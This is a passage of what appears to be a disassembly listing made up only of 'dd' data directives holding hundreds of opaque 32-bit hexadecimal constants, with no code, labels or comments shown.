		dd 0F2923FC3h, 210532Fh, 0F6ECE4C7h, 0EB860099h, 0A758E7A2h
		dd 6160084Bh, 0B034E0F2h, 8AAD4309h, 4B330938h,	55AD7699h
		dd 60C9F759h, 346936C5h, 0A3686E29h, 4FF02F96h,	85DFE74h
		dd 72B86FF4h, 0C63BE35Bh, 59BB842Eh, 0FF4768E5h, 465E5ACAh
		dd 97178ED9h, 2CDA77ECh, 186DF3DAh, 526E0E90h, 0D7C92FFAh
		dd 3FB89EEDh, 4672EEB3h, 81EDDE05h, 5B9FB93Ch, 7FF51F11h
		dd 835421Ch, 98F6FBAEh,	3500E0B4h, 8C86391Fh, 0E52ACAFAh
		dd 0AB32F4Ah, 5DB17D21h, 24027291h, 0BDC28562h,	0E394DEA6h
		dd 0DEB5B6EBh, 0C24207BCh, 0AD3C988Bh, 0EB004B50h, 0F6430B41h
		dd 0A81B5B8Bh, 3E27F03Eh, 12785D18h, 7A504371h,	2A8D8DB4h
		dd 1CE61ACh, 5D27043Fh,	2DD5E882h, 0EB18E368h, 1E9B8A4Ch
		dd 0A8021F87h, 54BE86EDh, 890D6DF5h, 69C24A83h,	0A562DEC8h
		dd 0A77D531Ch, 0A884E80Ah, 0C8DB1484h, 0F3555AF2h, 6260F98Ah
		dd 0ACD923EAh, 0E1A2368Ch, 8164A89Bh, 0A2B13726h, 0FE04AE8Ah
		dd 8BC555F5h, 8D4DA385h, 6EA6ABCh, 0E21D9C3Eh, 9ACD3557h
		dd 6381F42Bh, 0FD1FFDF0h, 0FEB54790h, 0EAB97016h, 138D32ECh
		dd 0F42558CBh, 0FDF4EE6Ch, 8E48AD45h, 0AB2D5C07h, 0B0330618h
		dd 0FC6837DCh, 5C8A5B61h, 0EB28118Ch, 0ADFD394Ch, 0CBF03219h
		dd 0E8F9A2A4h, 95126D24h, 92ED90CDh, 50E75084h,	2F3E288Eh
		dd 80C6EA8Eh, 14257FB2h, 296A01CEh, 0F01546BCh,	95B84224h
		dd 6070D071h, 0D8C1A319h, 2EC7A424h, 0D6D5BD10h, 959110E9h
		dd 2E46A9D0h, 0A297BD4Fh, 0A67A038Ch, 0FE1ED7Eh, 0F5F6691Ch
		dd 3066F7E3h, 581D9259h, 0B95BDC3Bh, 3B60EAB8h,	0E74AEDD4h
		dd 3ED9C62h, 6A6A8109h,	0F852281Bh, 5A59EBA7h, 0FC0F4FBEh
		dd 0A1CC30F9h, 332722F5h, 31554DD4h, 5D15BB9Ch,	6DA132F2h
		dd 0DCFC07CAh, 56F20819h, 0E36BE76h, 88FA0935h,	8A0507E5h
		dd 17F8DB3Bh, 83C8355Fh, 35156F8Bh, 923B875Ah, 5397D703h
		dd 971EDEDDh, 0A6428C90h, 9E48838Bh, 4B8EE190h,	0A1D98048h
		dd 0A41021D8h, 78D79D50h, 0AD68186Bh, 34FDB092h, 4BFDA07Dh
		dd 8FEBE6D1h, 916F561Fh, 0B925F514h, 51E47C11h,	0BEDFD1D4h
		dd 0BD79FD94h, 6C0C0A78h
		dd 63FF3B5Eh, 0EA9A2FFFh, 41F25B46h, 449A50Bh, 0C6337C1Eh
		dd 0F505A848h, 33486E1h, 0AD2CC42Ch, 20144D29h,	99F7B1CBh
		dd 53051095h, 1947D7A1h, 7164AC03h, 0CB47E80Ah,	47E5AA79h
		dd 860EBF8Bh, 0D502AEC2h, 36DDA91Dh, 0DD3B6EA6h, 0F49DA662h
		dd 0BC9D88A1h, 0B9EE5193h, 0BCFF33FDh, 6E2B3F9Ch, 0F52363B1h
		dd 7154DAB9h, 2AB15C5Eh, 5B7771D9h, 0CF419509h,	0BCC72502h
		dd 0AC5C2FE9h, 1D9ACE62h, 3A7C7FBBh, 58117D48h,	1B41DBD0h
		dd 0E7420811h, 2AB28E02h, 0B028437Ah, 0EC421144h, 508CD2D0h
		dd 911B1C0h, 0F81C940Ah, 0B3AD9ECCh, 0F6FB3568h, 9BCC786Eh
		dd 0A299481Dh, 98591DF4h, 0FA479580h, 0CC167FBBh, 0D1A30EA7h
		dd 7A0E98F2h, 0CABC9983h, 0F03EC493h, 0AE32F040h, 4CF40BA7h
		dd 2AECFD3Ch, 5631F6CBh, 0B10DC966h, 20F4A1Ah, 241B0F94h
		dd 0E9F4C214h, 7E8C9A90h, 87E9B05Fh, 0F3C0CFDDh, 6F62816Ch
		dd 1BD8F886h, 0DCB793DAh, 5502114Bh, 0AA6DC7CFh, 4AB09BABh
		dd 0C54A06D2h, 61C2EAA4h, 0F888AB62h, 58334303h, 0B81E61CBh
		dd 0D797C9E9h, 0F1D61F4Fh, 0ABA85018h, 3FD0A6F2h, 4F9E1869h
		dd 86EB1525h, 0E24897B1h, 816903AEh, 85BE228Bh,	81E318E2h
		dd 9ABA7EA9h, 0C921D76Ch, 3761D39Dh, 95DBFAABh,	0AD6A2F3Dh
		dd 1F88DE57h, 5E98952Eh, 0CB85B35Ch, 5FDD3AB1h,	556C76D0h
		dd 0D54AA7C1h, 4AAB25FCh, 0DBE44D47h, 75D62BD3h, 72953F1Bh
		dd 0CE39095Dh, 686881ECh, 0BA59829h, 0F571E166h, 82E380A6h
		dd 10B5AF18h, 63B4152Bh, 65C16D71h, 0A65B3F30h,	12C67680h
		dd 1955345Ch, 455923D2h, 0DC99569Ch, 4573513Fh,	79E470C4h
		dd 7CA3C860h, 9815B154h, 90515695h, 602AF640h, 661A65ABh
		dd 3446DFE3h, 5755ACFAh, 987566F9h, 5FC0ED1Fh, 96E8B243h
		dd 673DF9E8h, 71024CD2h, 0C7E1FDAAh, 8B5B3B27h,	2B03E3E2h
		dd 88A9C5F6h, 0DA5C593Ch, 0A28D42DFh, 415E0CFDh, 31AE1D84h
		dd 681A7A35h, 0E0F33511h, 0FC37A799h, 0A4736230h, 8A72EF0Ah
		dd 916C5479h, 0A7AFD047h, 0A1EEAB9Bh, 89EB9C85h, 2454321Fh
		dd 0EF8BF1E0h, 0A8C221EFh, 0EC2EE0B9h, 7A57B909h, 795556F4h
		dd 4F446899h, 41A3B593h, 0B8A5A8BBh, 0A03775DCh, 4E47A28Fh
		dd 9F38791Bh, 0B41D6707h, 0A3F6941Eh, 67F70451h, 1A5F3A22h
		dd 822F10Ch, 77AE64F1h,	7A53F13Bh, 310AE371h, 81A9C722h
		dd 79469DA3h, 94D22B92h, 0A8DAEF57h, 0F2F3D53h,	0C23897A7h
		dd 0C15B68D1h, 0AC0625E3h, 0D0FC9ED8h, 753D730Ch, 0BE36FECBh
		dd 0F5F554B1h, 1B50546Eh, 0A6D74202h, 0F0CC4439h, 0CF38707Dh
		dd 40EA0FEFh, 0CA2B89F3h, 1E1420F7h, 0CA23601Ch, 0E30B0F03h
		dd 69E854EBh, 513D9AF1h, 0A1F8B117h, 850C8CF3h,	2C7BEC6Ch
		dd 73852F1Ch, 8FBF1955h, 42BBAFFAh, 0DF960C9Fh,	22B04802h
		dd 25A68863h, 0E3A83812h, 0EAE43D13h, 0DCB16676h, 6C475131h
		dd 0A3F7C0A5h, 0F027B895h, 0ACD05AFBh, 99A3320Eh, 0F5E30C7Ah
		dd 0C95F5ECh, 9F7816AAh, 0B6DF5DD6h, 358D6E7h, 0C181A13Bh
		dd 495A192Bh, 0B88E84C3h, 47D081B5h, 0C5F19F82h, 15B45526h
		dd 7A6B728Ch, 46B35D8Ah, 0D60A1A89h, 18E22D9h, 1D33E33Eh
		dd 59270F3Ah, 0A3F382AEh, 0D667031Bh, 40647943h, 6AC990DCh
		dd 463F1919h, 412E1D4Ch, 0DDA8B97Bh, 944AD52Ah,	7ECF8DA0h
		dd 933C7DD4h, 0CC96B840h, 0D1E2A8D5h, 0BA556F4Ah, 0FD768250h
		dd 4D1CE0F9h, 0A3F09E8Ah, 5A0A431Ah, 7CF5A536h,	0B175CE38h
		dd 0F22FD926h, 0FDEDDA58h, 52358969h, 466FDAEAh, 0E6EFA5AFh
		dd 0E12903F9h, 411A6C12h, 56C9F1CBh, 992BDF75h,	0B988AC98h
		dd 3617A324h, 0B5DD9D88h, 0F0EBA0Fh, 0A2B1843Fh, 0F829B307h
		dd 0E69B256Dh, 5990DE5Ch, 974D59B3h, 0D5AD989Dh, 0F57D03E2h
		dd 0FFB319E3h, 0D62FE0FCh, 207D1596h, 4677DD24h, 9C7EEC5Ch
		dd 38AFF90Fh, 84F499C7h, 36E2A973h, 885B3A8Eh, 3BE6D13Eh
		dd 0C1398DAEh, 7F6ABB4Dh, 0C4C311BFh, 3688D620h, 0B5EBCAEAh
		dd 0EF5B9D1Fh, 0E278AC82h, 0BE934183h, 0CAE10FEEh, 0DCDC5DCAh
		dd 3E3698D9h, 681A2C6Eh, 857068C4h, 803179B3h, 0FAE8493Dh
		dd 9E40F441h, 0CFA62204h, 0CAF25D96h, 9FC5067Eh, 0DEE32001h
		dd 0B70EB82Ch, 0FCD9D4D7h, 6C141F83h, 5C07D4BEh, 26826C97h
		dd 10297B7Dh, 6D11B4F9h, 0CB10975Dh, 0C3BA9F24h, 7202A5C1h
		dd 1E137427h, 58D7FCBDh, 0DCF728BBh, 0D2D8682Ah, 2B45B152h
		dd 5883EB0Eh, 0DC8DD34Ah, 0FD1C35B9h, 55F3FCBEh, 0C3F60FC2h
		dd 6F12E54Eh, 8BFA9FDFh, 4D852591h, 0F6BE207Ch,	50D28F03h
		dd 3572502Dh, 83C6FEEAh, 0AE0E3863h, 61E18E85h,	0C58F86B1h
		dd 6C565799h, 386ACAF4h, 0BF1EA3E5h, 0D985141Ch, 4C9EDF54h
		dd 7B738E1Bh, 286808C5h, 1BE9EE99h, 0BAE754EDh,	0F3D44C63h
		dd 72BE6D79h, 0E7398EEBh, 0E8A9E8D2h, 59B2DAACh, 85FFC5F9h
		dd 0DEB2E4EFh, 69D8521Eh, 3A2806DEh, 0F89B76E5h, 5AE856A1h
		dd 53026CE1h, 0CD297834h, 0A564EB2Ah, 5FAA55FCh, 0FC8DC8C2h
		dd 3BB93244h, 0D56449E8h, 0F91E5576h, 6B60D7CCh, 7C90227Ch
		dd 0CA722F47h, 8F50FC02h, 5A70C706h, 1F3E76BDh,	506C6005h
		dd 7E869787h, 0BECA521Fh, 17AC579Dh, 0F1D1F72h,	4BF16C82h
		dd 0BC96D8F6h, 0FDB9A5D5h, 0DCCD51D0h, 60787140h, 46162D42h
		dd 0F40FFCADh, 4C4B88F4h, 0FDF516DEh, 5C90248Dh, 379F471Ah
		dd 53BC2F0Ah, 354CC86h,	7B15F1E3h, 77825D46h, 0C73D2D4Bh
		dd 13450159h, 126B0FF7h, 0C72DE85Fh, 2A1644E6h,	521CEBBFh
		dd 0A4B2F92Fh, 0C8505FE5h, 553DAAFh, 7D1EF99Fh,	3C1BA2D5h
		dd 0A66DC9B0h, 45CCEE7Ah, 3162740Eh, 3BF9F1A2h,	0F023A1E4h
		dd 0FC631E0h, 0B0DA551Ch, 970EC943h, 0D1BD40F4h, 0FD32D1D5h
		dd 0DC8F1897h, 2C59D26h, 854A07C1h, 2FFCAE82h, 32B93903h
		dd 219829C2h, 3F151D5Ch, 0B96679CCh, 5DEEAAFDh,	96BA5B33h
		dd 0A8EEE707h, 0F69129D3h, 97F004BDh, 0D12E15BDh, 4D70F625h
		dd 240FD09Eh, 90FBD13Dh, 74B99A3Bh, 0B6CB8FB1h,	1780AD17h
		dd 2C683130h, 38C71323h, 17E7E38Dh, 0AFB1424Fh,	0ABC95BB8h
		dd 399F71F6h, 6156F6B6h, 5AC91844h, 140B63DDh, 3A8AA865h
		dd 95557FDDh, 34D8ECE2h, 4501A1A3h, 0C70579EAh,	0E8E4CD23h
		dd 66F43582h, 0E7078092h, 2D1995C8h, 8BFD87BEh,	19FC9064h
		dd 0C703E837h, 560B0A67h, 5441CE07h, 6DA831ECh,	0BEC8C63Bh
		dd 29C060EFh, 0DB29343Fh, 960050CEh, 84EEEE2Bh,	5CB52C99h
		dd 993139B4h, 2A8C9F3h,	0FD15305Ah, 0D1D1669Ah,	0D1D7113Bh
		dd 0D8916DE2h, 579E3AA9h, 5100DDBh, 0E9A8296Ch,	7DF8C3F3h
		dd 0D781E36Ch, 0E2FE944Eh, 5B790B44h, 1BA9F19Ah, 0B98EDC38h
		dd 0A890CF4Ch, 0ACAB6FD9h, 83E216FAh, 5CDCF415h, 9A1A2F56h
		dd 0DB1453A3h, 70514694h, 0F2943132h, 22EB4081h, 221263BEh
		dd 9636B1D4h, 0A2BFC143h, 80242164h, 747CA7A9h,	0FDB38629h
		dd 66E6FDFDh, 0E9EAB443h, 0C3B9C388h, 76E7C3B1h, 3B12AB76h
		dd 3878CAB5h, 5A07C0FDh, 0D1497314h, 80C42728h,	0A2892B50h
		dd 13EB7B7Ch, 483E33ECh, 0CA739BC6h, 59728EE2h,	1B60F460h
		dd 1F5D86B6h, 22793158h, 0B27AF713h, 0F4AF1E27h, 2EB51A5Eh
		dd 0E81271F8h, 5928BC4Ch, 89CD7829h, 55D07A86h,	0DEC4D28Ch
		dd 0F2C6A816h, 7ADD17FBh, 4748149h, 0EEEBA35Bh,	0A0FEE84Ah
		dd 0F7C503E7h, 0F0D43C4Eh, 3889F1A7h, 4FC6143Bh, 6AD8F115h
		dd 0CA73D551h, 428BBF8Ah
		dd 0A09BEDDDh, 35B1F169h, 229F77A3h, 46D135DBh,	0D0B8CABDh
		dd 0DDDF28D2h, 43780B47h, 0C902A825h, 5BC84AA1h, 0E153DCE4h
		dd 0CA3690D4h, 71D95509h, 0DF2B5905h, 21C285F7h, 225E6CF3h
		dd 2B2D71E5h, 306C86A3h, 7D0652Ch, 4F7420B3h, 72942AFEh
		dd 17CD32CFh, 4D0565A2h, 0E89C7480h, 0D8AF8317h, 0B6EEF9F6h
		dd 0B90DE379h, 528A5002h, 0FE71A685h, 88BD58E8h, 5D1EA086h
		dd 9D127260h, 0C5924808h, 414AF263h, 0A4E05572h, 1088547Bh
		dd 0BF08D97Fh, 74E7E04h, 0D2A57B8Fh, 0E3B4DA30h, 743DAF4Dh
		dd 0D7443F0h, 2C4BF287h, 8260016Bh, 649983C0h, 5B1E7ECAh
		dd 0FCF1BA52h, 1B75360Ch, 22C5A508h, 0CFE7D028h, 6DBF6D17h
		dd 0C39D303Eh, 7F728A6Dh, 2201B5E2h, 8A8458A2h,	0D070C6D6h
		dd 6D1CB332h, 0B7DA254Dh, 0DBADAC89h, 0FF7ADE92h, 0B3185B42h
		dd 6E85C62Ah, 0F3F5125Eh, 0C277C7DBh, 0DB937F2Ah, 5D169C64h
		dd 3CFC68A5h, 52505668h, 0C8C018BEh, 67B42DB9h,	0BE3A5681h
		dd 0E1ED6726h, 37305BA6h, 0FD52BD6Ch, 1947FC4Dh, 0C3F70610h
		dd 0DB823D43h, 0B055D2A7h, 0C1B73729h, 0B4144E46h, 0DA29ADF8h
		dd 0A90498AFh, 205912D5h, 466C78AAh, 23A152B4h,	4323F478h
		dd 0E8471256h, 9898D1E9h, 602724D4h, 0DFC28662h, 0B0C3F077h
		dd 0C5ABE7C1h, 17DA1144h, 53879241h, 0CAC615A2h, 0D0C4F07Eh
		dd 6674761Dh, 8465F0F5h, 440CE902h, 3F7D6EF7h, 1F45AB50h
		dd 80B62D78h, 37C29F39h, 9A92AFD9h, 2717A5B8h, 0C465935h
		dd 1549CA4Eh, 0D5D2785Fh, 8DB1232Bh, 5D89D95Dh,	0C85D4CB0h
		dd 0DC9970B5h, 20E03E68h, 913A6DAAh, 8C9E981h, 0D5649C6h
		dd 8540C057h, 0E71F12C8h, 9D9795A2h, 0FC797AEh,	5A4776Dh
		dd 2A23664Ch, 826CADE1h, 0AB0E63A9h, 88019E38h,	0A3E9260Fh
		dd 2D1693DFh, 0B5DA523Eh, 0A4311B00h, 0C8F16F0Fh, 0E28F17E7h
		dd 0D5AD7096h, 8697DD4Ah, 0C0F11DDEh, 98726B5Eh, 48089BA4h
		dd 0F1F0A5B8h, 9E598E43h, 0E2A22992h, 0E99668C0h, 6BC7D195h
		dd 759092F5h, 17C0F5DFh, 0F3ED9AE5h, 0AB8BF7E5h, 0BA53AF66h
		dd 0A9B0F737h, 0BA536D32h, 0F4797E7Dh, 4E73E85Fh, 0EFAC6A07h
		dd 0C2B5EF59h, 4956B14Bh, 0BB027BEBh, 70591E3Fh, 0AE0FD795h
		dd 2555A354h, 37320E1Ch, 9FEDE87Eh, 0D8C9F918h,	91F4BF09h
		dd 38FE208Bh, 0A0B361FAh, 4C9FD2Eh, 0AE0F8D6h, 0B132FDE0h
		dd 7D32256Eh, 926A616Bh, 93752AF0h, 4079552Eh, 0D09DF6C1h
		dd 0BD54E193h, 0BF11046Eh, 0C8C18632h, 0C9FE3A25h, 5F313FD6h
		dd 0F463D3D4h, 139869D6h, 500BF01Ch, 0F7DF1E17h, 0BD670B76h
		dd 69AA7D6Fh, 0F3B77255h, 0D4C16F4Bh, 18BF9EB9h, 6507ACC0h
		dd 42312A6Ch, 0C771C4EBh, 0D23029EFh, 19C45587h, 7EFCCBDEh
		dd 0B463E822h, 4A174B0Fh, 0E657A812h, 9A8B9E0Ch, 69BEFA87h
		dd 96E5EED5h, 0A956FC65h, 0E76CFB52h, 86C0F83Eh, 5ACE6A3Fh
		dd 4F03F22Ch, 95632D59h, 0B113F338h, 0D4F3C0C2h, 259E876Bh
		dd 0AB6F08E2h, 54D4997Ch, 11B2268Ah, 0C80EF91Ch, 3812523Eh
		dd 0B572C231h, 0BC0FF52Fh, 37DE8C1Bh, 0BE51D55Ah, 0F7CC021Dh
		dd 0FA94C92h, 0A59D14CEh, 1AEE5C18h, 2F29657Ah,	242EC714h
		dd 4D8E9985h, 788A119Ch, 8F9606BAh, 0AA7CE2ADh,	7EAA034Dh
		dd 4EC812BCh, 76E795E4h, 59EADC17h, 0EC8718ACh,	5D9F68Bh
		dd 0B0EE3F3Dh, 71418631h, 9FB69D63h, 0ED1E35FCh, 8FA96B54h
		dd 607D1F5Bh, 1536D1B3h, 0FB71BDFCh, 0B081F45Fh, 0A71C92D2h
		dd 22B55B23h, 0A313F2EAh, 3EFE0D95h, 581E4771h,	3D3CFCB4h
		dd 113605FEh, 7FA122BAh, 0CBFBD212h, 0A7F59AA9h, 9B2A605Bh
		dd 0AD1B43F1h, 604762C8h, 8FEEA7ACh, 8B986135h,	6ED666BDh
		dd 1532B692h, 0E5166B2Ah, 413BD97h, 0BAF387FCh,	3C53BB2Dh
		dd 0B5BF9405h, 5CA498ADh, 8379CD76h, 745BF4BFh,	4F529695h
		dd 1D97083Bh, 543F59B2h, 0D52F2B6Eh, 26B511F9h,	0FC956AB6h
		dd 44C60B8Ah, 769A34CBh, 3F0C58A8h, 1611E854h, 694D7F98h
		dd 0F3CFB72Eh, 25A5C54Ch, 44745944h, 8AFD9A8h, 0CCF73247h
		dd 8CF2CE1Dh, 6774081Eh, 0D402C0C7h, 83688D2Ch,	70340EA6h
		dd 2811FCE9h, 55128DFh,	0F331765Eh, 292E22C1h, 3F772E92h
		dd 0BD56ADDAh, 0AD34998Ch, 0D45C3423h, 6D5B48A7h, 618EC292h
		dd 0F31EDD09h, 0C78007F7h, 1133F547h, 63ACDFC4h, 0B5D680ABh
		dd 83E762FCh, 81B8804Bh, 0A661EDCCh, 0A30EFF43h, 8F87495Dh
		dd 0EE839D67h, 4B4A3B1Bh, 0E800E9AEh, 3A0D1012h, 980DC66Bh
		dd 895F0A41h, 0EDB62F57h, 1CBFC0F3h, 7FB62A1Dh,	691E1Bh
		dd 0FFCA4E1Ch, 0C1DF8410h, 0B49DE9B0h, 0B97CCBF0h, 570F5E37h
		dd 4C88AFB1h, 7989F665h, 19F7DF49h, 1872303Fh, 29631BDFh
		dd 0E5ED54A8h, 0A5725EA4h, 51141378h, 211B3558h, 0A83EFF7Ch
		dd 0AD13F705h, 5AD11E02h, 0C37F042Dh, 0BB5FFB3h, 24DF6B39h
		dd 0EAA9D59Dh, 0DE6047EBh, 4E669912h, 5260EEFh,	0FE8FA2D9h
		dd 0C1ABCA8Ch, 2D32C3C4h, 0A364D8D8h, 1F0AD6A7h, 0FDF53A9Ch
		dd 727BA211h, 8216E137h, 15A3EC9Ah, 5EB43B7Eh, 3F0367FBh
		dd 0C26548ECh, 0FD42F598h, 7D368FF7h, 0EAB3D0F0h, 7502EE65h
		dd 3AABDB8Eh, 1AF7374Fh, 40CA03EDh, 8539C1F5h, 51CF7961h
		dd 26A951A0h, 65E9DAB0h, 0ACDFDD9Bh, 215ED059h,	9DD3A6F3h
		dd 69AE6417h, 0A2ED8A6h, 0D30AA1A8h, 32346500h,	0D554FCDAh
		dd 0E623E85Ch, 1B08F72Bh, 44DFFCF5h, 7AD8A2C2h,	2503B515h
		dd 0CFD58581h, 0B503ED34h, 0D14AC246h, 0E42D5040h, 84EDEC1Ch
		dd 9BF1F8BCh, 984F5713h, 0EC4A6A54h, 1C9BF511h,	0B942EF61h
		dd 144AB3F9h, 14A6326Fh, 0B04BA948h, 4E96FA32h,	0C297F7F5h
		dd 0AC12A764h, 34C296Bh, 0BB8B6A74h, 35144FB2h,	93782EBh
		dd 0DAE95573h, 2B56FEA7h, 0E5271E2Ch, 2511EB96h, 17CED01Eh
		dd 0AB0F1F8Fh, 81984992h, 428078Eh, 0CF3FC529h,	20EEC65Ah
		dd 0E83F88F7h, 673A6B1Ah, 547452E7h, 6D7636AEh,	0E8962B4Eh
		dd 17BC6AADh, 56F48279h, 5689D2AFh, 45063F54h, 537A48Dh
		dd 71299174h, 3A829E5Bh, 0E2E980CAh, 453E294Fh,	0D856AF29h
		dd 0AD673398h, 413BF7CDh, 2E9F602Ch, 0EF55EBADh, 772AE607h
		dd 0A0D1FCC8h, 4F2A0E8Bh, 69FEFAF1h, 578AD1h, 2D42DA76h
		dd 2B3450E6h, 157B9BDAh, 686282F4h, 0DB5B110Ah,	7052147Dh
		dd 5CADDD67h, 9C0ED9D2h, 42B3A318h, 6F7E1E6h, 953331E0h
		dd 0C7BBF758h, 0A359A164h, 81CBC3C8h, 771A044Ah, 0A2F687E3h
		dd 0D309359Fh, 0D778E902h, 0A114C6EAh, 0D70A6E0Fh, 1819333Ah
		dd 0C737EFC7h, 159FF9Bh, 7373914Fh, 3A9A666Bh, 0E181BD97h
		dd 9E429546h, 0F8FBE791h, 4F2A2945h, 2AB31E46h,	8715B55Bh
		dd 898C38ABh, 985C79A4h, 1538B691h, 0E6EB7039h,	5011941Dh
		dd 0ABF71E69h, 7B71B6D4h, 7D45184Dh, 9FA3842Dh,	0D06FBD2Dh
		dd 0F021D35Dh, 8AAE61CFh, 68EF85EBh, 325672B5h,	581FCB78h
		dd 0D5DDD6A1h, 8DE3C513h, 0B7198B82h, 6C057273h, 133485E5h
		dd 29ECFF33h, 2E3E17B8h, 5D2745BBh, 95D35DF1h, 0B03C6FB6h
		dd 0A6DD9D6h, 93B1A9E7h, 36F8AA6Bh, 0EEF71B6Bh,	0D53B557Eh
		dd 0BBC45D17h, 2D3F0CD5h, 7D050513h, 0F37C02C9h, 0FEFE02F8h
		dd 92192046h, 7ACEDD21h, 0F4665A70h, 0A7435A0Fh, 89F22A1Fh
		dd 5134B8A0h, 1594B740h, 6AA5FBB0h, 0BEEDF1F1h,	6C8CAA6Ah
		dd 557409Dh, 0CE953F01h, 8BBDBD06h, 0EAF57135h,	8032AB6Eh
		dd 562D2AFAh, 6DB2AC39h
		dd 54D01B0Fh, 6FEA90ABh, 54154C54h, 959AAD0Dh, 4A716E38h
		dd 54FF5233h, 73499C8Fh, 0A8C498F7h, 54C5704Bh,	7818DF65h
		dd 399F9F0Fh, 6A2A6776h, 5C4F05FEh, 0D4E37A39h,	1051D568h
		dd 160823F0h, 0A695BE56h, 0D6A83A51h, 3592217Fh, 0CA512838h
		dd 0E4D4DA1Bh, 5209E4F5h, 8EB29715h, 35A22BABh,	0DEDFAA19h
		dd 2A187798h, 0B8E5B75h, 0EC701E14h, 0F37E7F0Eh, 1280D21Eh
		dd 0DD6018C9h, 85FAED8Eh, 0D0AB77B3h, 0C7A2E8A2h, 309312B7h
		dd 0E92EDEA9h, 0B4AD3B6Ah, 532A77E1h, 2A9B68AAh, 0C963D9BBh
		dd 0F7F4464Bh, 909F997h, 0E71179D1h, 4CD57FBEh,	7ADA887h
		dd 0F040E6DBh, 30BB2F45h, 0C4285AC1h, 0FE9D7962h, 1E45B6E9h
		dd 0C2C907C0h, 0CE73C2Eh, 8873ADEAh, 99FAE2C8h,	28B00F6Dh
		dd 0E055F83Ch, 82CE14C3h, 0EEA15B47h, 20A9D6ADh, 5FFBC4FBh
		dd 88500D4Bh, 0FAE25BBAh, 8DA89AAAh, 0CBF2C0A4h, 0DF004C7Ch
		dd 0BBC83529h, 46D2A9B9h, 1B9C7405h, 1EEA3F40h,	6D651DC7h
		dd 4AC4BA5h, 9552838Dh,	0B93ACB1Fh, 8CF2D140h, 827562A1h
		dd 0ADBC40h, 0AFD2CC88h, 0F66B9F9Eh, 6982A030h,	5F456BC0h
		dd 7123AFFEh, 913C1C51h, 0C5AE7073h, 3657E010h,	0B81F80C9h
		dd 9B651603h, 6D1D574Ah, 0C2F2FED4h, 0BE846DA4h, 0B511EB8h
		dd 0EAED2DCDh, 0EF5BE513h, 7E33350Fh, 5E04D52Bh, 509D4B47h
		dd 7CFAD84Dh, 71CBB711h, 0FCF8234Ch, 0C2541513h, 339D1712h
		dd 0FF2AAAC0h, 0BEDDBDE2h, 359CF635h, 3DDAC3B1h, 8B120F07h
		dd 0FCFEBC5Bh, 6F008C9Ah, 212BE235h, 8E3360CBh,	500B3D1Ch
		dd 79F4DECDh, 0B457DCAFh, 0F2AB3031h, 9DEB6634h, 41CB6C53h
		dd 50599A5h, 0D1EE0A13h, 2CDC1F0Ch, 0BE6FEACBh,	6F307C71h
		dd 97F7754Dh, 305ADA90h, 14F8CEEEh, 82FE3908h, 2D7C7E96h
		dd 0E8EA8394h, 0C2D25B8Ah, 0A336C113h, 0D5E903ACh, 0A092295Ch
		dd 0D666A86h, 84517DF2h, 7C0F7E79h, 4EDA36DEh, 0CED3DB81h
		dd 9B1E192Fh, 468F277h,	434A0F1Ah, 6635A752h, 0AE2380AFh
		dd 5F5A764Ah, 9EBA93CAh, 828D280Ah, 0D79EA7EFh,	33B2FEABh
		dd 449D49D2h, 31A0A5Eh,	3F5E49Ch, 721BD7DBh, 3AC3A5E6h
		dd 6CC3087Eh, 0D3D8371h, 0B0A1E68Ch, 17D664Ch, 2B9EFC5h
		dd 0DF8F6EE6h, 4CD7FDB7h, 1542B0C3h, 0A995E83Bh, 5F7E70F4h
		dd 26E8EFADh, 44B19DCEh, 3D63ADAh, 769FE0F3h, 23B9AFDFh
		dd 0AAA2BDC7h, 29435AB2h, 0E2EB49A0h, 6215E0F1h, 0E73E65CEh
		dd 0E35FF9C3h, 0D7492AB2h, 2886BACAh, 1B1242B2h, 51245D1Dh
		dd 0B40A3199h, 7B4DB46Dh, 0F8258EA8h, 0E47551C0h, 27143F2Ch
		dd 0B8ED5EB3h, 0B71E3F1Bh, 0C670CB20h, 0D1822DB2h, 4B01D2EFh
		dd 0A5F39683h, 48AD5C5Ch, 3971C4B2h, 3F73324h, 472C9741h
		dd 0F6BB8C95h, 4F9E818Bh, 921104E9h, 378F2CECh,	396531E0h
		dd 0C98A5681h, 3CAE4A7h, 0B756C973h, 0C0ABBBCBh, 0F7DDBAF2h
		dd 0F0DD3E27h, 50952750h, 0D1345469h, 4FEFC442h, 5A767EB4h
		dd 67598E85h, 0D560235Ah, 0D5688CC0h, 7F2E0AE1h, 1A8FD6E3h
		dd 0F41F5CDAh, 954B908h, 0FEFEECF4h, 29E5E965h,	0A00F12DFh
		dd 34C2A3CDh, 4B056FF7h, 5FBDBA67h, 49E2167Ch, 5337D458h
		dd 0A8EF85Dh, 8B226AA8h, 6138181Fh, 86D8B2F2h, 0C300B3h
		dd 0B4694EFAh, 5D4F1FD4h, 0AA05107Eh, 0C294F627h, 0D7609EFDh
		dd 29AECD01h, 0E7557D7Ch, 0ACA0F63Ah, 63734552h, 0E8304FC1h
		dd 7683DA98h, 9DF9A7B8h, 0C257F63Ah, 64657C88h,	0E9687C68h
		dd 0AB5F3C21h, 0F556A853h, 5A97985Fh, 0C36444BCh, 0DC48EBC4h
		dd 0E0A3B2E8h, 0B6AB0BF4h, 0A4117127h, 0CD279958h, 0F96B60Ch
		dd 993DC10Ch, 3EB31852h, 85565948h, 0FFDB0976h,	642FC45h
		dd 39933BDDh, 0B8321034h, 0B2A77DC7h, 0BE0F9DC5h, 1B03C2D3h
		dd 44C36551h, 97198864h, 92D47B81h, 2E555502h, 881FA87Eh
		dd 0C8D9EC13h, 0DD72AB03h, 0EE8BED73h, 0DFAFF0Dh, 86A663A5h
		dd 0E803862Fh, 0FCA94E6Fh, 9009133h, 0E0E8FED5h, 0E8C38E5Bh
		dd 62010C4Fh, 7E01B95Dh, 410F579Fh, 0ED035A4Dh,	7875F74Ah
		dd 0E690EEE0h, 0E5463E5Eh, 0F7C0BE90h, 7BADD1AAh, 0AEB9FC8h
		dd 51B84478h, 0C5C7ABF2h, 28F086B5h, 0DAAF96CFh, 0CFD155A1h
		dd 5832843Fh, 141C72A4h, 957BEB0Ah, 8EC4ABA8h, 0C06D7C36h
		dd 0A1F8CDA2h, 0E515B658h, 61435279h, 5039DAA5h, 0C2F13E4h
		dd 7DBCA4F7h, 991AEC07h, 6367155Ah, 0F1859E9Eh,	95076FE1h
		dd 0F83AB263h, 42CB6F63h, 0FC7E02E8h, 0FF536050h, 0A568B3D6h
		dd 54DDB462h, 2961D749h, 0C35C6A7Fh, 8D2C9403h,	7DAAFBE7h
		dd 0CB8F351Dh, 0AEC399B4h, 0DB6D09D6h, 7ACDDF9Eh, 2C0FDA2Fh
